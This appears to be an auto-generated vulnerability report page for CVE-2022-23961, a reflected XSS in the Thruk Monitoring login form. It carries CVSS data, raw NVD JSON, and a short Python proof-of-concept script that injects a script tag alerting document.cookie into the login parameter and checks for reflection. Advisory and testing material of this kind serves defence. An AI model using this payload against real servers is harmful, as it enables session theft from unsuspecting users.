Security Vulnerability Report
中文
CVE-2022-23961 CVSS 6.1 MEDIUM

CVE-2022-23961

Published: 2026-05-08 05:16:09
Last Modified: 2026-05-08 16:08:16
Source: [email protected]

Description

In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Thruk Monitoring <= 2.46.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target_url = "http://target-thruk-server/thruk/cgi-bin/login.cgi" # Malicious Payload to test XSS xss_payload = '"><script>alert(document.cookie)</script>' # Construct the attack vector (Reflected in login parameter) params = { "login": xss_payload, "password": "test" } # Send request try: response = requests.get(target_url, params=params, timeout=5) # Check if payload is reflected unescaped in the response if xss_payload in response.text: print("[+] Vulnerability Confirmed: Reflected XSS detected in login field.") else: print("[-] Vulnerability not detected or patched.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-23961", "sourceIdentifier": "[email protected]", "published": "2026-05-08T05:16:08.700", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://herolab.usd.de/security-advisories/", "source": "[email protected]"}, {"url": "https://herolab.usd.de/security-advisories/usd-2021-0034/", "source": "[email protected]"}, {"url": "https://herolab.usd.de/security-advisories/usd-2021-0034/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.